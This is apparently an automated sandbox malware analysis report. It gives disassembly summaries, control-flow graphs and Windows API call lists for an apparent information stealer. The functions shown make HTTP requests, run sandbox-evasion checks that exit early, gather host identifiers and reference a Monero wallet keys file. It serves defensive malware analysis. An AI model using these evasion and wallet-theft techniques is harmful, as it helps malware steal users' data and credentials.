                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d9da77870f466049eeb9ff5a2d61d9fdefeb6d02ff66c507d2c284f992cbdca2
                              • Instruction ID: c9baa8d314c8f650661bea869da5df87001cc78f4c94fd91a414c064df3420ea
                              • Opcode Fuzzy Hash: d9da77870f466049eeb9ff5a2d61d9fdefeb6d02ff66c507d2c284f992cbdca2
                              • Instruction Fuzzy Hash: BA622BB5500B00AFE746DFA8ED889563BFDF74C701F14859BB609C3264D739A452EB22
                              Function 00146280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 146280-14630b call 15a7a0 call 1447b0 call 15a740 InternetOpenA StrCmpCA 1040 146314-146318 1033->1040 1041 14630d 1033->1041 1042 14631e-146342 InternetConnectA 1040->1042 1043 146509-146525 call 15a7a0 call 15a800 * 2 1040->1043 1041->1040 1044 1464ff-146503 InternetCloseHandle 1042->1044 1045 146348-14634c 1042->1045 1061 146528-14652d 1043->1061 1044->1043 1047 14634e-146358 1045->1047 1048 14635a 1045->1048 1050 146364-146392 HttpOpenRequestA 1047->1050 1048->1050 1052 1464f5-1464f9 InternetCloseHandle 1050->1052 1053 146398-14639c 1050->1053 1052->1044 1056 1463c5-146405 HttpSendRequestA HttpQueryInfoA 1053->1056 1057 14639e-1463bf InternetSetOptionA 1053->1057 1059 146407-146427 call 15a740 call 15a800 * 2 1056->1059 1060 14642c-14644b call 158940 1056->1060 1057->1056 1059->1061 1066 14644d-146454 1060->1066 1067 1464c9-1464e9 call 15a740 call 15a800 * 2 1060->1067 1070 146456-146480 InternetReadFile 1066->1070 1071 1464c7-1464ef InternetCloseHandle 1066->1071 1067->1061 1076 146482-146489 1070->1076 1077 14648b 1070->1077 1071->1052 1076->1077 1080 14648d-1464c5 call 15a9b0 call 15a8a0 call 15a800 1076->1080 1077->1071 1080->1070
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • InternetOpenA.WININET(00160DFE,00000001,00000000,00000000,00000000), ref: 001462E1
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00146335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00146385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001463BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001463D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001463FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0014646D
                              • InternetCloseHandle.WININET(00000000), ref: 001464EF
                              • InternetCloseHandle.WININET(00000000), ref: 001464F9
                              • InternetCloseHandle.WININET(00000000), ref: 00146503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: fe9ed1c2f6b5ba1ad2dec3a1797073c9f539b9181a28d69d2259d7c69bb1d431
                              • Instruction ID: d5de3ba24c3c6f76057ef2885da0d6a9926d764e582977410e63f8ad89165688
                              • Opcode Fuzzy Hash: fe9ed1c2f6b5ba1ad2dec3a1797073c9f539b9181a28d69d2259d7c69bb1d431
                              • Instruction Fuzzy Hash: 87715B71A40218EBEB24DFA0CC49BEE77B8BF44705F508199F5096B190DBB46A89CF52
                              Function 00155510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 155510-155577 call 155ad0 call 15a820 * 3 call 15a740 * 4 1106 15557c-155583 1090->1106 1107 155585-1555b6 call 15a820 call 15a7a0 call 141590 call 1551f0 1106->1107 1108 1555d7-15564c call 15a740 * 2 call 141590 call 1552c0 call 15a8a0 call 15a800 call 15aad0 StrCmpCA 1106->1108 1124 1555bb-1555d2 call 15a8a0 call 15a800 1107->1124 1134 155693-1556a9 call 15aad0 StrCmpCA 1108->1134 1138 15564e-15568e call 15a7a0 call 141590 call 1551f0 call 15a8a0 call 15a800 1108->1138 1124->1134 1139 1557dc-155844 call 15a8a0 call 15a820 * 2 call 141670 call 15a800 * 4 call 156560 call 141550 1134->1139 1140 1556af-1556b6 1134->1140 1138->1134 1269 155ac3-155ac6 1139->1269 1142 1556bc-1556c3 1140->1142 1143 1557da-15585f call 15aad0 StrCmpCA 1140->1143 1147 1556c5-155719 call 15a820 call 15a7a0 call 141590 call 1551f0 call 15a8a0 call 15a800 1142->1147 1148 15571e-155793 call 15a740 * 2 call 141590 call 1552c0 call 15a8a0 call 15a800 call 15aad0 StrCmpCA 1142->1148 1162 155865-15586c 1143->1162 1163 155991-1559f9 call 15a8a0 call 15a820 * 2 call 141670 call 15a800 * 4 call 156560 call 141550 1143->1163 1147->1143 1148->1143 1246 155795-1557d5 call 15a7a0 call 141590 call 1551f0 call 15a8a0 call 15a800 1148->1246 1169 155872-155879 1162->1169 1170 15598f-155a14 call 15aad0 StrCmpCA 1162->1170 1163->1269 1177 1558d3-155948 call 15a740 * 2 call 141590 call 1552c0 call 15a8a0 call 15a800 call 15aad0 StrCmpCA 1169->1177 1178 15587b-1558ce call 15a820 call 15a7a0 call 141590 call 1551f0 call 15a8a0 call 15a800 1169->1178 1198 155a16-155a21 Sleep 1170->1198 1199 155a28-155a91 call 15a8a0 call 15a820 * 2 call 141670 call 15a800 * 4 call 156560 call 141550 1170->1199 1177->1170 1275 15594a-15598a call 15a7a0 call 141590 call 1551f0 call 15a8a0 call 15a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                              APIs
                                • Part of subcall function 0015A820: lstrlen.KERNEL32(00144F05,?,?,00144F05,00160DDE), ref: 0015A82B
                                • Part of subcall function 0015A820: lstrcpy.KERNEL32(00160DDE,00000000), ref: 0015A885
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001556A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155857
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155228
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 001552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155318
                                • Part of subcall function 001552C0: lstrlen.KERNEL32(00000000), ref: 0015532F
                                • Part of subcall function 001552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00155364
                                • Part of subcall function 001552C0: lstrlen.KERNEL32(00000000), ref: 00155383
                                • Part of subcall function 001552C0: lstrlen.KERNEL32(00000000), ref: 001553AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0015578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00155A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 50cf5adc04d0f77fe029cd0930ea2de546ab241a107125c03029f6cedc8d07af
                              • Instruction ID: 114fad11d2ed8dc8121e8184d5aea86eb13deaa88f4351ccdb463528e119a7f5
                              • Opcode Fuzzy Hash: 50cf5adc04d0f77fe029cd0930ea2de546ab241a107125c03029f6cedc8d07af
                              • Instruction Fuzzy Hash: F0E15671950604EADB04FBB0DC629ED733DAF64302F808259B9275B091EF346B4DCB92
                              Function 001517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 1517a0-1517cd call 15aad0 StrCmpCA 1304 1517d7-1517f1 call 15aad0 1301->1304 1305 1517cf-1517d1 ExitProcess 1301->1305 1309 1517f4-1517f8 1304->1309 1310 1519c2-1519cd call 15a800 1309->1310 1311 1517fe-151811 1309->1311 1313 151817-15181a 1311->1313 1314 15199e-1519bd 1311->1314 1315 151835-151844 call 15a820 1313->1315 1316 1518f1-151902 StrCmpCA 1313->1316 1317 151951-151962 StrCmpCA 1313->1317 1318 151970-151981 StrCmpCA 1313->1318 1319 151913-151924 StrCmpCA 1313->1319 1320 151932-151943 StrCmpCA 1313->1320 1321 15185d-15186e StrCmpCA 1313->1321 1322 15187f-151890 StrCmpCA 1313->1322 1323 151821-151830 call 15a820 1313->1323 1324 1518ad-1518be StrCmpCA 1313->1324 1325 1518cf-1518e0 StrCmpCA 1313->1325 1326 15198f-151999 call 15a820 1313->1326 1327 151849-151858 call 15a820 1313->1327 1314->1309 1315->1314 1346 151904-151907 1316->1346 1347 15190e 1316->1347 1329 151964-151967 1317->1329 1330 15196e 1317->1330 1332 151983-151986 1318->1332 1333 15198d 1318->1333 1348 151926-151929 1319->1348 1349 151930 1319->1349 1350 151945-151948 1320->1350 1351 15194f 1320->1351 1338 151870-151873 1321->1338 1339 15187a 1321->1339 1340 151892-15189c 1322->1340 1341 15189e-1518a1 1322->1341 1323->1314 1342 1518c0-1518c3 1324->1342 1343 1518ca 1324->1343 1344 1518e2-1518e5 1325->1344 1345 1518ec 1325->1345 1326->1314 1327->1314 1329->1330 1330->1314 1332->1333 1333->1314 1338->1339 1339->1314 1355 1518a8 1340->1355 1341->1355 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001517C5
                              • ExitProcess.KERNEL32 ref: 001517D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: cca6aa714e4b91157fb478bbb9dfc58f01f7e3983c1b877508088bc5a147b48e
                              • Instruction ID: 240bc0711ca73618e4b3e8ceb4c994fd799f638606bbe8e7352a00dd2e0d5a3e
                              • Opcode Fuzzy Hash: cca6aa714e4b91157fb478bbb9dfc58f01f7e3983c1b877508088bc5a147b48e
                              • Instruction Fuzzy Hash: 7A5181B4A04209FFDB06DFA0D954BBE77B9BF4430AF10814DE8266B240D770D959CB62
                              Function 00157500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 157500-15754a GetWindowsDirectoryA 1357 157553-1575c7 GetVolumeInformationA call 158d00 * 3 1356->1357 1358 15754c 1356->1358 1365 1575d8-1575df 1357->1365 1358->1357 1366 1575e1-1575fa call 158d00 1365->1366 1367 1575fc-157617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 157619-157626 call 15a740 1367->1369 1370 157628-157658 wsprintfA call 15a740 1367->1370 1377 15767e-15768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00157542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0015760A
                              • wsprintfA.USER32 ref: 00157640
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 5c92bdb1dd9475943dab001c926f44b6e9cb130e07cf94e174d7cbfe79dc8f7d
                              • Instruction ID: 10e08316484374d86cbe93d4fb58035c8aed4ca8743b160c1388449df259ab9d
                              • Opcode Fuzzy Hash: 5c92bdb1dd9475943dab001c926f44b6e9cb130e07cf94e174d7cbfe79dc8f7d
                              • Instruction Fuzzy Hash: 264182B1D04348EBDB11DF94DC45BDEBBB8AF18701F100199F9196B280E775AA48CBA5
                              Function 001569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0ED8), ref: 001598A1
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0F50), ref: 001598BA
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E18), ref: 001598D2
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0DD0), ref: 001598EA
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E30), ref: 00159903
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD8FC0), ref: 0015991B
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DC5220), ref: 00159933
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DC52E0), ref: 0015994C
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0EA8), ref: 00159964
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0F08), ref: 0015997C
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E60), ref: 00159995
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E90), ref: 001599AD
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DC51C0), ref: 001599C5
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0C68), ref: 001599DE
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 001411D0: ExitProcess.KERNEL32 ref: 00141211
                                • Part of subcall function 00141160: GetSystemInfo.KERNEL32(?), ref: 0014116A
                                • Part of subcall function 00141160: ExitProcess.KERNEL32 ref: 0014117E
                                • Part of subcall function 00141110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0014112B
                                • Part of subcall function 00141110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00141132
                                • Part of subcall function 00141110: ExitProcess.KERNEL32 ref: 00141143
                                • Part of subcall function 00141220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0014123E
                                • Part of subcall function 00141220: __aulldiv.LIBCMT ref: 00141258
                                • Part of subcall function 00141220: __aulldiv.LIBCMT ref: 00141266
                                • Part of subcall function 00141220: ExitProcess.KERNEL32 ref: 00141294
                                • Part of subcall function 00156770: GetUserDefaultLangID.KERNEL32 ref: 00156774
                                • Part of subcall function 00141190: ExitProcess.KERNEL32 ref: 001411C6
                                • Part of subcall function 00157850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001411B7), ref: 00157880
                                • Part of subcall function 00157850: RtlAllocateHeap.NTDLL(00000000), ref: 00157887
                                • Part of subcall function 00157850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0015789F
                                • Part of subcall function 001578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157910
                                • Part of subcall function 001578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00157917
                                • Part of subcall function 001578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0015792F
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00156AF9
                              • Sleep.KERNEL32(00001770), ref: 00156B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156B1A
                              • ExitProcess.KERNEL32 ref: 00156B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 90577678b61c3f85e874b1ceda239ec17f76cbac6ffb9bec849872e8cc60b439
                              • Instruction ID: 8a535cb2656f6521985320f2052b9427b1aa007db6883624df8f71c318fb279a
                              • Opcode Fuzzy Hash: 90577678b61c3f85e874b1ceda239ec17f76cbac6ffb9bec849872e8cc60b439
                              • Instruction Fuzzy Hash: 70314470980208EBDB05F7F0DC56BEE7778AF24702F904619F922AA191EF705949C7A2
                              Function 00141220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 141220-141247 call 1589b0 GlobalMemoryStatusEx 1439 141273-14127a 1436->1439 1440 141249-141271 call 15da00 * 2 1436->1440 1442 141281-141285 1439->1442 1440->1442 1444 141287 1442->1444 1445 14129a-14129d 1442->1445 1447 141292-141294 ExitProcess 1444->1447 1448 141289-141290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0014123E
                              • __aulldiv.LIBCMT ref: 00141258
                              • __aulldiv.LIBCMT ref: 00141266
                              • ExitProcess.KERNEL32 ref: 00141294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
